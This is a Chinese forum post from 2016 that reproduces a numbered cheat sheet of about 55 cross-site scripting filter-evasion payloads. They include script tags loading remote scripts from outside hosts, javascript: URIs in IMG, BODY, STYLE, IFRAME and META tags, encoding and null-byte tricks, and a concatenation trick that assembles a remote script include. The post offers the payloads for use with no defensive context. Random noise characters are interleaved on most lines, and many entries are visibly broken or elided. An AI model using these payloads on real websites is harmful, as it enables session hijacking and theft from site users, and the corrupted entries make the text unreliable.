(1)普通的XSS JavaScript注入
, F& U( m% ^% J- C3 y1 Q<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ w7 I* x6 j' }5 y8 t7 V(99)另类弹框
* L2 Q: n1 |2 s2 }' Y<q/oncut=alert()>1) o. O" n/ t) J: Z3 N
<s/onclick=alert()>b2 R/ e( [5 J" f& B
<XSS=" onclick="alert(1)//">clickme</SSX=">
8 d7 G; G2 A& n4 g% l) E# { I <zzz onclick=alert`1`>clickme</zzz>
9 n/ }! t" Q4 q8 f# R" z <a onclick=alert`1`>clickme</a>
# N5 i/ j/ k3 q* _4 D<a=">clickme</a=">
2 e1 |6 r$ a! o: L5 _5 y4 t: Q<a=">clickme</a># b, c _* C- E
<z=">clickme</z=">8 j4 U' n( y4 L7 I% {0 @/ ^
<z onclick=alert`1`>clickme</z>+ |: ~ a/ P, `. m1 l% E+ d
# Q# a+ j- L6 U- B
(2)IMG标签XSS使用JavaScript命令
: \3 f6 w. I; b }$ O' K6 u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 R) r6 i$ ]2 [* d) i5 V
h+ }+ f- J0 I6 ^1 Z" p# ^. {(3)IMG标签无分号无引号- a. [! r* c0 W: L
<IMG SRC=javascript:alert(‘XSS’)>3 p! `5 h* j& s$ j% W* e
4 @2 P# o: }6 m& i2 j& I8 U) l(4)IMG标签大小写不敏感
; k+ ?: A0 a! m5 a5 {9 i% b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 A. H1 t$ t& R D5 k
6 c' C- i; F! B& M(5)HTML编码(必须有分号)
/ K, i- O3 _" ?2 z6 x8 I% m( K' c, w A<IMG SRC=javascript:alert(“XSS”)>
1 j6 s* C2 O6 h: F9 [' w6 F; t
/ v4 c" Y0 g) k& }& `8 s5 j(6)修正缺陷IMG标签3 ?* K: s Y% G& E' j
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ Q# V6 |6 h5 l6 T/ @# p9 j5 C7 _
; g. o% Y C. B. |1 y8 J9 P, d& s(7)formCharCode标签(计算器)5 N. K% R7 r- |2 V
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) j n+ W! m" r9 b
- g' h+ l5 t9 _" p(8)UTF-8的Unicode编码(计算器)8 v" |9 c8 c4 t' L) g1 k
<IMG SRC=jav..省略..S')>
/ o: Z c7 `3 `
5 Q8 S) `7 T |) j5 Z$ t0 U* U(9)7位的UTF-8的Unicode编码是没有分号的(计算器). Q) _3 g" C4 O, H
<IMG SRC=jav..省略..S')>2 G. w3 N9 g: D: d; {
% K2 _7 C) W$ C) \8 N/ j(10)十六进制编码也是没有分号(计算器)1 V- Z! a, q$ Y) f# o
<IMG SRC=\'#\'" /span>
, u: Y0 s/ k! c, m3 F4 X+ A
5 K1 F* G0 N; f& S(11)嵌入式标签,将Javascript分开
/ ^. S: b9 v! N' P<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 O0 K/ C& U! `: I
9 y& [; v8 j3 b6 N0 o" w% l(12)嵌入式编码标签,将Javascript分开
* ~- Z. R: y! ~% |1 b( M9 @$ r<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& M. Z4 G$ e0 t" c' L
; O: O" }3 c5 C) J(13)嵌入式换行符
% ?7 {& j. ~2 X( K9 A7 _1 N<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# Z2 f j2 f- B0 O8 \/ m7 `# \0 o; k" V7 C$ p2 _) i: S' Y
(14)嵌入式回车: ?; c9 U: \1 e& ?
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* N) n5 ?0 B/ c1 D; S
2 }. J. `2 r9 h% e/ E(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 U( O, v9 Y. q5 V! T h8 B8 r
<IMG SRC=\'#\'" /span>
& B& l0 r& @8 P- R% |9 X3 W$ }% u3 o! X# |/ }: @
(16)解决限制字符(要求同页面)
% Y/ a" t3 _3 r<script>z=’document.’</script>
" L. @" }: f9 i L<script>z=z+’write(“‘</script>: _% g% ]! x7 d: T
<script>z=z+’<script’</script>9 S/ x+ ?6 h Y0 H- L9 G/ A. g: m
<script>z=z+’ src=ht’</script>- u( P3 G6 }6 J( R2 |, N
<script>z=z+’tp://ww’</script>5 l4 V; {# \1 |9 E" Y2 _9 H
<script>z=z+’w.shell’</script>
7 a+ J w( y- K- k7 r. Y2 u' d/ M<script>z=z+’.net/1.’</script>/ \$ ]' N( E/ w# i y5 b& U2 Z
<script>z=z+’js></sc’</script>% {5 R2 {1 [3 W( U
<script>z=z+’ript>”)’</script>( {# b; X9 t' y
<script>eval_r(z)</script>
& D6 Y! K3 o; s7 Q+ w* h; y6 x2 Z6 j1 x3 B/ d" G* _( l
(17)空字符
, c/ S$ o& X2 Y7 K' K5 _+ U! Bperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( w, U, M4 i% H* i: p
# h M: j: U- j, Y& A(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: Z) z+ \5 a. g4 i
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" |1 I M: B" t1 Y5 v
) k z4 X4 V3 ?6 Y0 Z(19)Spaces和meta前的IMG标签7 _% N0 v1 z$ U1 q& s
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>+ E6 Y* E' e q
9 R0 Q8 _- v/ I' v& ]7 @(20)Non-alpha-non-digit XSS( Q1 l; K; K" W3 l- i+ F
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
; O2 Q( I+ G2 ?9 y- w0 Z! T5 }+ z
+ M6 s3 U5 S" P9 p5 S6 i9 M(21)Non-alpha-non-digit XSS to 2
' T% P1 z' E ~! T) }9 {4 |: y( Y# o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- I$ Z. P* c& U+ D# H
+ C+ o3 C6 T9 K! l1 i3 {, E( W+ W(22)Non-alpha-non-digit XSS to 3
4 n* {( j' o% [3 p<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ b9 i; c9 t7 B, W, c
+ `! S+ t1 k# ?9 h(23)双开括号, K- `6 X6 ?' u P' \+ j5 l N* S( ~
<<SCRIPT>alert(“XSS”);//<</SCRIPT># @) M5 R6 n8 { g
3 `# {5 S; y1 i: b( x7 p(24)无结束脚本标记(仅火狐等浏览器)
- O: o1 n4 {- v+ {5 e<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>( n$ V4 D9 I( p* ?
; H0 `! A5 A9 [8 i6 o(25)无结束脚本标记2
( _" ]2 i2 g1 ]! ^<SCRIPT SRC=//3w.org/XSS/xss.js>
2 F4 w. s' v3 t
Q1 R' [1 G" z; G(26)半开的HTML/JavaScript XSS
& Q7 O7 z( P* {1 z7 }1 y<IMG SRC=\'#\'" /span>
' `7 `- h" w T! o
7 E- {( p; I* r/ g(27)双开角括号, A% O) z7 W8 ^& S* c' U6 _
<iframe src=http://3w.org/XSS.html <
( s" t7 H( E5 d; S. f
2 r! r; r3 S' a(28)无单引号 双引号 分号5 p9 I* L7 C! s
<SCRIPT>a=/XSS/
# W7 I' e4 k! Q+ G! p$ W+ m0 [alert(a.source)</SCRIPT>9 ~ C! ^: `% u3 i" a
B( C# U8 @5 F; b& q9 n
(29)换码过滤的JavaScript1 T( W: B3 l2 D2 T" i3 }/ k
\”;alert(‘XSS’);//
: k3 S% J. r2 C! V8 e0 \ j1 O0 V$ |/ ^' ?
(30)结束Title标签
4 K! A! v: R' I* ~2 Q# m; o$ i</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* x: T- h# a+ d6 s
" M+ t7 E) i( U T& E9 h
(31)Input Image
$ y$ _# }3 k1 U- [7 Q<INPUT SRC=\'#\'" /span>
4 `9 y- x1 A9 q7 A q5 @1 a, }5 ?1 B4 m1 E" W! R3 |0 Z, ]% R
(32)BODY Image
6 T6 c3 L4 ?8 J<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ ^0 y2 P/ B3 G& }# f$ B" s
9 g# w" h$ c7 T& v. v- m: N(33)BODY标签# i/ v7 p( [' ?: r2 M7 t
<BODY(‘XSS’)>
4 A( L* G- i6 l1 ~" W
$ U% w1 n3 L. q& T(34)IMG Dynsrc
: w% b: ^2 N: r4 j5 N<IMG DYNSRC=\'#\'" /span>
5 N1 h. r3 r. ]. c, k
3 s( L4 z% U- i6 X& z(35)IMG Lowsrc7 W4 S# J; f! i% P. K
<IMG LOWSRC=\'#\'" /span>% \- ^: P* B: J/ Z
, }4 N" ?" O+ h8 y
(36)BGSOUND* U3 |# @8 R" l# m
<BGSOUND SRC=\'#\'" /span>1 |9 @1 x. z$ q6 s! `& r) u
. ]& A2 E: ]0 |1 z4 L D. e(37)STYLE sheet7 s- R. L T x
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* Y# ?7 @* g& u" W3 |3 T
u/ x: n( P. y, z(38)远程样式表
) y4 P1 m9 t r$ Q& a* o<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* n# F. Q3 U5 E u9 Y
3 H% A. C9 b5 O, y, I" t3 y(39)List-style-image(列表式)
+ R# ^ n7 s+ j" O5 Y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; @( a, n3 Y- l$ ^$ w+ P& n* Q5 j# N3 r; z& O
(40)IMG VBscript9 T2 w: g4 m! ?3 g% G( p/ c
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
( O/ k: n Q! }) l3 C: e/ v" Z
; B4 x0 p! Y- ?% y3 J(41)META链接url
8 f4 H9 A& h% Z6 o2 i<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
) {$ u. g5 M3 O$ Y" @2 a1 G. x9 Z; @3 ?
(42)Iframe
& [ ^& i: X7 j: m' L& \+ U" p8 J<IFRAME SRC=\'#\'" /IFRAME>
" ~: o" V) G3 v3 O
$ o& ~* X3 i. P9 J(43)Frame% F$ g p; t2 _. R
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET> f, ]0 g3 @/ Y% S; |* R- J) z
) @5 V. K* e r(44)Table
, f* [4 y4 u/ p$ i9 |4 _<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* D0 V# m+ h2 O& }
5 v3 v0 D/ d, a3 m& P+ V$ W6 |
(45)TD
# x0 N4 x. r# c" P. W, w<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ D# r" [ H' N; n! p6 `$ Q* O
0 v+ S! v* k( O9 @* O; H, M+ V(46)DIV background-image
, U: x ~2 Y; T' Y5 @5 e<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 {# o% Y4 C( Q' x9 x# G
; J @' F- t3 F1 I2 L/ Q(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& h2 v: o3 X( B9 {<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
! \5 o! W0 ^9 [! h; p
) }/ D7 P- W( K(48)DIV expression# G( Z! J) g2 x6 ^% O" a
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 n- [' u' W0 r, m" u3 X* D% y* s. ~# @1 b
(49)STYLE属性分拆表达
; Q& }, f( t! ~( I0 r<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 ^! b, N; a5 W, a* ?" [' W8 s+ t
: [1 p1 {0 F9 s1 K) |' S* c, o3 [(50)匿名STYLE(组成:开角号和一个字母开头)
. g2 Q: Q3 s7 _2 S. J( p7 N: S<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# C. x* b8 s" \2 q' l7 Y* l( E0 j) L: n- b& c7 M" n2 L6 q* w
(51)STYLE background-image
! W8 n: v) i( [; H0 p<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>: s4 V1 M2 L: D/ r$ o
; v% V4 {$ C' n8 ^% @$ i
(52)IMG STYLE方式
1 b7 e9 r \% Aexppression(alert(“XSS”))’>
, f2 f, I2 N' B) Z! h; q3 }
1 s2 c9 p4 b q" J5 g2 h(53)STYLE background
: S+ C* @% T4 A<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 ~1 p" ]# A: G; l' l) d% m% }3 N2 \$ {" J' }/ I: g
(54)BASE% k+ y- e i2 E: I
<BASE HREF=”javascript:alert(‘XSS’);//”>6 k, G- d* c, Y' _# _- w
5 D, X: j: h* c
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# u0 z a- g) q& T
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>5 ?+ h' a. [ D- E0 f3 U) _" J/ U
|
发表于 2016-4-28 10:06:15
收藏
支持
反对